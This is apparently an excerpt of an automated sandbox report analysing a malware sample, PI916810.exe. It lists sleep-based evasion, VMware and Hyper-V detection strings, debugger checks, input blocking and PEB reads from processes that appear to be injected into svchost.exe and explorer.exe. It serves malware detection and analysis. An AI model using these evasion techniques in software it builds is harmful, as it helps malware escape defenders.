          Source: C:\Windows\explorer.exe TID: 5948Thread sleep time: -5824000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5948Thread sleep count: 7030 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5948Thread sleep time: -14060000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep count: 129 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep time: -258000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep count: 9842 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep time: -19684000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004C4696
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CC93C FindFirstFileW,FindClose,0_2_004CC93C
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004CC9C7
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF200
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF35D
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CF65E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3A2B
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3D4E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CBF27
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00464AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00464AFE
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2046728721.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PI916810.exeAPI call chain: ExitProcess graph end nodegraph_0-97878
          Source: C:\Users\user\Desktop\PI916810.exeAPI call chain: ExitProcess graph end nodegraph_0-97952
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D41FD BlockInput,0_2_004D41FD
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00463B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00463B4C
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00495CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00495CCC
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004DC304 LoadLibraryA,GetProcAddress,0_2_004DC304
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_010FD540 mov eax, dword ptr fs:[00000030h]0_2_010FD540
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_010FEB30 mov eax, dword ptr fs:[00000030h]0_2_010FEB30
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_010FEB90 mov eax, dword ptr fs:[00000030h]0_2_010FEB90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
